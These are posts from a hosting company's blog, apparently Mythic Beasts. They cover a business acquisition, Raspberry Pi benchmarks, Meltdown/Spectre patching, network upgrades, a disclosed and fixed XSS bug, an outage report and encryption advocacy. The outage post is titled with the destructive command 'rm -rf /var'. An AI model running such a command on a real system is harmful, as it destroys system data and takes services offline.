Retrosnub Acquisition

June 4th, 2018 by

A Mythic Beast eating a Retrosnub (artists impression)

Just before Christmas we were approached by Malcolm Scott, director of Retrosnub, a small cloud hosting provider in Cambridge. His existing connectivity provider had run out of IPv4 addresses. They’d decided to deal with this issue by adding charges of £2 per IPv4 address per month to encourage existing customers to return unused IPv4 addresses to them. As a cloud hosting provider with a substantial number of virtual machines (VMs) on a small number of hosts this had the result of tripling the monthly colocation bill of Retrosnub.

Aware of my presentation on IPv6-only hosting at UKNOF, Malcolm knew that opportunities for significant expansion were severely limited due to the difficulty of obtaining large amounts of IPv4 address space. Retrosnub faced a future of bankruptcy or remaining a very niche provider. His connectivity providers seemed strongly in favour of Retrosnub going bust so they could reclaim and re-sell the IPv4 space for higher margin services.

There are no expansion opportunities for new cloud hosting providers.

As a larger provider with our own address space, we had sufficient spare capacity in our virtual machine cloud to absorb the entire customer base of Retrosnub with no additional expenditure. Our work in supporting IPv6-only virtual machines will also make it easier to significantly reduce the number of IPv4 addresses required to support Retrosnub services. We formed a deal and agreed to buy the customer base of Retrosnub.

Combining operations

Since agreeing the deal, we’ve been working hard to merge our operations with minimum disruption.

The top priority was the domain name services because domains expire if you don’t renew them. Doing a bulk transfer of domain names between registrars is something which Nominet, the body responsible for UK domains, makes extremely easy, as it just requires changing the “tag” on all the domains.

Unfortunately, just about all other TLDs follow a standard ICANN process, which requires that a domain be renewed for a year at the time of transfer, and that the owner of the domain approves the process. If you were designing a process to destroy competition in a market by making it hard for resellers to move between registrars, it would look quite like this.

We’ve now got the bulk of domains transferred, and the next steps will be to migrate the DNS records from Retrosnub to Mythic Beasts so that our control panel can be used to change the records.

At the same time, we rapidly formulated a plan to migrate all the virtual machines in to stem the financial losses. Moving the VMs required an unavoidable change in IP address, and we also wanted to get them migrated from their current platform (Citrix Xenserver with para-virtualisation) to our own platform (KVM with full hardware virtualisation).

In order to ease the transition, we arranged for a pair of servers to do IP forwarding: a server in our cloud that forwarded the new IP to the VM in the Retrosnub cloud until it was migrated in, and another in the Retrosnub cloud that forwarded the old IP after the server had been moved. By doing this we were able to give customers a one week window in which to complete their IP migration, rather than forcing it to be done at the time that we actually moved the VM.

In the process of this migration, all customers received a significant bandwidth upgrade and majority received disk, RAM and CPU upgrades too.

We completed this on schedule before the quarterly colocation bill arrived, so instead of paying the much increased bill, we cancelled the contract and removed the servers from the facility.

Next steps

Our next step will be to migrate all the web and email hosting customers into our standard shared hosting environment. This has some time pressure as Google have plans for Chrome to start marking all non-HTTPS websites as insecure. We offer one click HTTPS hosting using Let’s Encrypt on all of our hosting accounts.

Raspberry Pi 3B+

March 14th, 2018 by

Today is Pi Day where we celebrate all things mathematical. Today is a super special Pi day, because a new Raspberry Pi has been released.

It takes the previously excellent Raspberry Pi 3 (or 3B, to give it its full name) and upgrades it with an extra 200Mhz of CPU speed and gigabit ethernet over USB 2. It fixes many of the netboot issues which Pete highlighted at the last big Pi Birthday Party and will soon have a new smaller and cheaper Power over Ethernet HAT. These new features are of particular interest for our Raspberry Pi Cloud service, as we use netbooted Pis, with network file storage and Power over Ethernet to enable remote powercycling.

Raspberry Pi 3B+.

We’ve had one to play with, and we’ve run our favourite benchmark – Raspberry Pi’s own website. We installed the full stack (MySQL, WordPress & PHP7) under Debian Stretch onto a Pi 3B and a Pi 3B+, and tried it out with 32 concurrent connections. We’re running near identical setups on the two servers: both have their files stored over the network on an NFS file server and it’s the same operating system and applications; only the kernel differs.

Model Pages/second
Raspberry Pi 3B 3.15
Raspberry Pi 3B+ 3.65

The new model is about 15% faster than the old one which is almost exactly as expected from the boost in clock speed; WordPress is CPU limited.

Checksumming the 681MB database file shows up the gigabit ethernet rather effectively. All our storage is over the network so reading files is a benchmark of the network speed.

Model Elapsed time Data rate
Raspberry Pi 3B 54.4s 11.25MB/s
Raspberry Pi 3B+ 28.1s 22.1MB/s

This is very nearly twice as fast as the previous model.

When is it coming to the Raspberry Pi Cloud?

The Raspberry Pi 3B+ is an obvious upgrade for our Raspberry Pi Cloud. We need to wait for the PoE HAT to become available. That will allow us better density and lower capital costs. However, the 3B+ consumes more power than the 3B so we need to do some thermal and airflow work before we can make it generally available.

Flatpak: pre-assembled furniture applications for Linux

February 23rd, 2018 by

Flatpack is furniture you build yourself. Flatpak is preassembled applications for Linux. This is apparently not at all confusing. (image thanks to https://www.flickr.com/photos/51pct/)

Flatpak provides Linux desktop applications in a secure sandbox which can be installed and run independently of the underlying Linux distribution. Application developers can produce one Flatpak and select the versions of libraries that their application is built, tested and run with so it’s easy for users on any Linux OS to get whatever was intended by the application developer.

Flathub is a distribution service to make sure that Flatpaks are available for popular Linux desktop applications, and at its heart is a private cloud running BuiltBot which builds popular Linux and free/open source desktop apps in Flatpak format. This lives in Mythic Beasts’ Cambridge data centre.

At Mythic Beasts we like this idea so much we offered them lots of free bandwidth (100TB) to help get them started. We’ve now upgraded this with a pair of virtual machines in our core Docklands sites to provide redundancy and more grunt for traffic serving.


Some of their users noticed and were appreciative immediately:

2017-02-23 16:30:00irc wow! Flathub is *so* much faster i’m getting like 10 MB/s compared to less than 1 this morning … and the search is now instant
2017-02-26 11:35PersiFlathub is _really_ fast now, great job to whoever is responsible
🙂

Meltdown and Spectre

January 17th, 2018 by

A rack of Pi 3s… possibly the only cloud computers immune to Spectre?

There’s been a lot of activity in the news regarding two new security issues called Meltdown and Spectre.

The security issues are newsworthy because they’re different to any security issues we’ve seen before. They’re not an issue in software, but in your computer itself. As a result the vulnerabilities cross multiple operating systems – Windows/Linux/OSX and multiple devices – Laptop/Desktop/Server/Phone, and they’re also a lot harder to fix.  Meltdown affects only Intel processors.  Spectre also affects AMD, Power, RISC and some ARM CPUs.

If you’d like to know how the vulnerabilities work, Eben Upton wrote up a clear explanation for Raspberry Pi – the only common functional computer that isn’t affected.

At present the fixes for Meltdown are effective but can cause significant slowdowns. Fixes for Spectre are incomplete and we have had reports that they can cause instability in Haswell and Broadwell families of Intel CPUs (which we own). Spectre is difficult and slow to exploit because it relies on reading memory one bit at a time.  At 1500bytes/second a full memory dump of one of our virtual server hosts (256GB RAM) would take around six years to complete.

Impact

Both issues allow information leakage so that lower priority processes on a server can read secret data from higher priority processes on the same CPU.  Any computer that accepts instructions from an untrustworthy source is at risk.  We’ve reviewed the impact across all of our services, and have applied or will be applying patches as required.  The impact on live hosting platforms is as follows:

Shared hosting servers

Our web hosting and shell account hosting platforms may have untrustworthy users on them. These servers have already been fully patched against Meltdown and fixes for Spectre will be applied as they become available.

Virtual server hosts

Our Virtual Server Cloud uses KVM with hardware virtualisation which is not vulnerable to Meltdown. Spectre patches are being worked on for the kernel which require new microcode for the CPU. KVM will also need to be updated to fully patch. When these updates are available and have been demonstrated to be stable we will be applying them to our host servers.

This will require a restart of our VM hosts and all guest VMs. Customers will be notified in advance of requiring a restart and each of our datacentres will be restarted at a different time to minimise disruption to customers with split site services.

Virtual server guests

Whilst the use of KVM with hardware virtualisation ensures that Meltdown cannot be used to break the isolation between virtual server guests, virtual servers themselves are potentially vulnerable to both Meltdown and Spectre.   Customers should ensure that their servers are patched and rebooted if they have untrusted users or execute untrusted code.

Dedicated servers

Dedicated servers are at no significant risk unless you allow untrusted third parties to upload and execute code. If that’s the case managed customers can contact support@mythic-beasts.com and we’ll apply the Meltdown and Spectre fixes and reboot as a mutually convenient time.

Raspberry Pi 3 servers

As mentioned above, the Raspberry Pi is not affected and no action is needed.

All other systems

We have reviewed the risk to all other systems and are applying patches as required.  This has included patching, as a high priority, all staff desktops and laptops; websites are allowed to execute javascript which can be used to execute a successful Meltdown attack.

Capacity upgrades, cheaper bandwidth and new fibre

December 8th, 2017 by

We don’t need these Giant Scary Laser stickers yet.

We’ve recently upgraded both our LONAP connections to 10Gbps at our two London POPs bring our total external capacity to 62Gbps.

We’ve been a member of LONAP, the London Network Access Point, since we first started running our own network. LONAP is an internet exchange, mutually owned by several hundred members. Each member connects to LONAP’s switches and can arrange to exchange traffic directly with other members without passing through another internet provider. This makes our internet traffic more stable because we have more available routes, faster because our connections go direct between source and recipient with fewer hops and usually cheaper too.

Since we joined, both we and LONAP have grown. Initially we had two 1Gbps connections, one in each of our two core sites. If one failed the other could take over the traffic. Recently we’ve been running both connections near capacity much of the time and in the event of failure of either link we’d have to fall back to a less direct, slower and more expensive route. Time to upgrade.

The upgrade involved moving from a copper CAT5e connection to optic fibre. As a company run by physics graduates this is an excellent excuse to add yet more LASERs to our collection. Sadly the LASERs aren’t very exciting, being 1310nm they’re invisible to the naked eye and for safety reasons they’re very low powered (~1mW). Not only will they not set things on fire (bad) they also won’t blind you if you accidentally look down the fibre (good). This is not universally true for all optic fibre though; DWDM systems can have nearly 100 invisible laser beams in the same fibre at 100x the power output each. Do not look down optic fibre!

The first upgrade at Sovereign House went smoothly, bringing online the first 10Gbps LONAP link. In Harbour Exchange proved a little more problematic.  We initially had a problem with an incompatible optical transceiver. Once replaced, we then saw a further issue with the link being unstable which was resolved by changing the switch port and optical transceiver at LONAP’s end. We then had further low level bit errors resulting in packet loss for large packets. This was eventually traced to a marginal optical patch lead. Many thanks to Rob Lister of LONAP support for quickly resolving this for us.

With the upgrade completed, we now have two 10Gbps connections to LONAP, in addition to our two 10Gbps connections into the London Internet Exchange and multiple 10Gbps transit uplinks, as well as some 1Gbps private connections to some especially important peers.

To celebrate this we’re dropping our bandwidth excess pricing to 1p/GB for all London based services.  The upgrades leave us even better placed to offer very competitive quotes on high bandwidth servers, as well as IPv6 and IPv4 transit in Harbour Exchange, Meridian Gate and Sovereign House.  Please contact us at sales@mythic-beasts.com for more information.

Education, and the teacher becomes the student.

October 6th, 2017 by

Learn more about XSS with Google

For a long time we’ve sponsored Gwiddle, a project that outgrew its hosting on Microsoft Azure, providing free hosting accounts for students. They’ve now become a fully fledged charity, The Gwiddle Foundation, and we’ve had to upgrade the servers we donated to accommodate their ever expanding user base.

Part of their security team is the very talented Aaron Esau (15), who recently applied his penetration testing skills to our website and picked up a difficult to exploit bug.

On our page that allows you to search for domain names, our code embedded the search terms in the results page without appropriately escaping the content. This is a classic cross site scripting bug. Exploiting this bug was far from trivial, as the search term had to be short and from a restricted character set.

Aaron managed to craft an exploit using an ingeniously short payload to extract a session cookie and has posted a full write-up of the vulnerability and exploit.

If you had recently logged into our control panel, not logged out, and then visited a malicious page with this exploit, then the attacker could steal a cookie which would, in theory, give the attacker access to your control panel pages. However, we practise defence in depth, and our cookies are tied to an IP address so simply stealing the session cookie doesn’t give you access unless you also share a source IP address. This is an example where NAT and IPv4 is less secure than having IPv6.

Once Aaron brought the bug to our attention we swiftly fixed the page, thanked him for notifying us and sent him an Amazon voucher to thank him for his time and responsible disclosure.

We should emphasise that we do not believe that anyone has ever attempted to exploit this bug, and that the IP restrictions on session cookies mean that the consequences were fully mitigated.

Nonetheless, it’s embarrassing for us to have such a stupid bug in our code and we’ve been investigating how it occurred. It seems that the reason it crept in is because the domain ordering pages use a different form framework from everything else. Most of our pages have HTML generated by a template, and wherever dynamic data is included, it’s run through a filter to escape any HTML characters. The domain ordering pages use a different approach with much of the HTML being generated by a form module which we then include verbatim into our output. Obviously the HTML in this data mustn’t be escaped, as it would break the form; the form module is responsible for escaping any user input. Unfortunately, there are some other parts of the page which don’t come from the form module, and so do need to be escaped. It’s not very clear from the template code which is which, leading to the bug of not escaping some fields.

Raspbian Stretch now available in the Raspberry Pi Cloud

August 31st, 2017 by

A very short service announcement.

Raspbian Stretch is now available for Raspberry Pis hosted in our Raspberry Pi Cloud. This joins Raspbian Jessie and Ubuntu Xenial as available images. With all of these you can upload an SSH key through our control panel and log in directly. Re-imaging and rebooting can both also be done directly from our control panel.

Re-imaging your Raspberry Pi will reset the image and delete all data on your Cloud Pi.

On the server side the most significant upgrade is PHP 7, which should double the performance of PHP-based applications running on the Raspberry Pi.

rm -rf /var

August 10th, 2017 by

Within Mythic Beasts we have an internal chat room that uses IRC (this is like Slack but free and securely stores all the history on our servers). Our monitoring system is called Ankou, named after Death’s henchman that watches over the dead, and has an IRC bot that alerts through our chat room.

This story starts with Ankoubot, who was the first to notice something was wrong with the world.

15:25:31

15:25:31 ankoubot managed vds:abcdefg-ssh [NNNN-ssh]: 46.235.N.N => bad banner from `46.235.N.N’: [46.235.N.N – VDShost:vds-hex-f]
15:25:31 ankoubot managed vds:abcdefg-web [NNNN-web]: http://www.abcdefg.co.uk/ => Status 404 (<html> <head><title>404 Not Found</title></head> <body bgcolor=”white”> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.10.3</center> </body> </html…) [46.235.N.N www.abcdefg.co.uk VDShost:vds-hex-f]

15:31:42

15:31:42pete I can’t get ssh in, I’m on the console.

15:38:16

15:38:16pete This is an extremely broken install. ssh is blocked, none of the bind mounts work

Debugging is difficult because /var/log is missing. systemd appears completely unable to function and we have no functioning logging. Unable to get ssh to start and fighting multiple broken tools due to missing mounts, we restart the server and mail the customer explaining what we’ve discovered so far. This doesn’t help and it hangs attempting to configure NFS mounts.

15:53:53

15:56:35

Boot to recovery media completes ready for restore from backup.

15:58:34

16:05:07

16:08:36

16:08:36 ankoubot managed vds:abcdefg-ssh [NNNN-ssh]: back to normal
16:08:36 ankoubot managed vds:abcdefg-web [NNNN-web]: back to normal

16:14:22

16:31:42

Customer confirms everything is restored and functional and gives permission to anonymously write up the incident for our blog including the following quote.

Mythic Beasts had come highly recommended to me for the level of support provided, and when it came to crunch time they were reacting to the problem before I’d even raised a support ticket.
This is exactly what we were looking for in a managed hosting provider, and I’m really glad we made the choice. Hopefully however, I won’t be causing quiet the same sort of problem for a looooong while.

In total the customer was offline for slightly over 30 minutes, after what can best be described as a catastrophic administrator error.

FRμIT: Federated RaspberryPi MicroInfrastructure Testbed

July 3rd, 2017 by

The participants of the FRμIT project, distributed Raspberry Pi cloud.

FRμIT is an academic project that looks at building and connecting micro-data-centres together, and what can be achieved with this kind of architecture. Currently they have hundreds of Raspberry Pis and they’re aiming for 10,000 by the project end. They invited us to join them, we’ve already solved the problem of building a centralised Raspberry Pi data centre and wanted to know if we could advise and assist their project.  We recently joined them in the Cambridge University Computer Lab for their first project meeting.

Currently we centralise computing in data centres as it’s cheaper to pick up the computers and move them to the heart of the internet than it is to bring extremely fast (10Gbps+) internet everywhere. This model works brilliantly for many applications because a central computing resource can support large numbers of users each connecting with their own smaller connections. It works less well when the source data is large and in somewhere with poor connectivity, for example a video stream from a nature reserve. There are also other types of application such as Seti@Home which have huge computational requirements on small datasets where distributing work over slow links works effectively.

Gbps per GHz

At a recent UK Network Operator Forum meeting, Google gave a presentation about their data centre networking where they built precisely the opposite architecture to the one proposed here. They have a flat LAN with the same bandwidth between any two points so that all CPUs are equivalent. This involves around 1Gbps of bandwidth per 1GHz of CPU. This simplifies your software stack as applications don’t have to try and place CPU close to the data but it involves an extremely expensive data centre build.

This isn’t an architecture you can build with the Raspberry Pi. Our Raspberry Pi cloud is as about as close as you can manage with 100Mbps per 4×1.2GHz cores. This is about 1/40th of the network capacity required to run Google architecture applications. But that’s okay, other applications are available. As FRμIT scales geographically, the bandwidth will become much more constrained – it’s easy to imagine a cluster of 100 Raspberry Pis sharing a single low bandwidth uplink back to the core.

This immediately leads to all sort of interesting and hard questions about how to write a scheduler as you need to know in advance the likely CPU/bandwidth mix of your distributed application in order to work out where it can run. Local data distribution becomes important – 100+ Pis downloading updates and applications may saturate the small backbone links. They also have a variety of hardware types, the original Pi model B to the newer and faster Pi 3, possibly even some Pi Zero W.

Our contribution

We took the members of the project through our Raspberry Pi Cloud is built, including how a Pi is provisioned, how the network and operating system are provisioned and the back-end for the entire process from clicking “order” to a booted Pi awaiting customer login.

In discussions of how to manage a large number of Federated Raspberry Pis we were pleased to find considerable agreement with our method of managing lots of servers: use OpenVPN to build a private network and route a /48 of IPv6 space to it.   This enables standard server management tools work, even where the Raspberry Pis are geographically distributed behind NAT firewalls and other creative network configurations.

Donate your old Pi

If you have an old Raspberry Pi, perhaps because you’ve upgraded to a new Pi 3, you can donate it directly to the project through PiCycle. They’ll then recycle your old Raspberry Pi into the distributed compute cluster.

We’re looking forward to their discoveries and enjoyed working with the researchers. When we build solutions for customers we’re aiming to minimise the number of unknowns to de-risk the solution. By contrast tackling difficult unsolved problems is the whole point of research. If they knew how to build the system already they wouldn’t bother trying.

Encryption is vital

June 7th, 2017 by


We refuse to bid for government IT work because we can’t handle the incompetence.

At Mythic Beasts we make use of free secure encryption all the time. Like all powerful tools such as roads, trains, aeroplanes, GPS navigation, computers, kitchen knives, vans and Casio watches; things that are very useful for day to day life are also useful for criminals and terrorists. It’s very popular for our politicians and the Home Office, especially our current prime minister King Canute Theresa May and leader of The Thick Party, to suggest that fully secure encryption should be banned and replaced with a weaker version that will reveal all of your secrets but only to the UK security services.

We disagree and think this is a terrible idea. There’s the basic technical objection that a backdoor is a backdoor and keeping knowledge of the backdoor secret is essentially impossible. There’s a recent practical demonstration of this: the NSA knew of an accidental backdoor in Windows and kept it secret.  It was leaked, resulting in the thankfully not very effective WannaCry virus which disabled substantial fractions of the NHS. The government is very good at scope creep: the Food Standards Agency refused to disclose why it needs the power to demand your entire internet history. We think it fundamentally wrong that MPs excluded themselves from the Investigatory Powers act. Then there’s simple commercial objections: it’s a slight commercial disadvantage if every UK product has an ‘Insecure By Order of The Home Office’ sticker on the front when your foreign competitors products don’t.

However, Mathematics does not care what our politicians wish and refuses to change according to their desires. Strong cryptography is free, available on every computer, and can be given away on the front of a magazine. Taking away secure cryptography is going to involve dragging a playstation out of your teenagers’ hands, quite literally stealing from children. Of course secure communications will still be available to any criminal who can illegally access some dice and a pencil.

It’s a good job you can’t build encryption machines with childrens toys.

At Mythic Beasts we make extensive use of open source free cryptography. OpenSSH protects our administrative access to the servers we run and the customers we manage. OpenSSL protects all our secure web downloads, including last month’s million or so copies of Raspbian ensuring that children with a Raspberry Pi don’t have their computer compromised. We make extensive use of free certificates through Let’s Encrypt and we’ve deployed tens of thousands of upgraded packages to customers which are securely verified by GnuPG.

Without these projects, vast quantities of the internet would be insecure. So we’ve made donations to OpenSSH, GnuPG and Let’s Encrypt to support their ongoing work. We’d like to donate to OpenSSL but we can’t see easily how to pay from a UK bank account.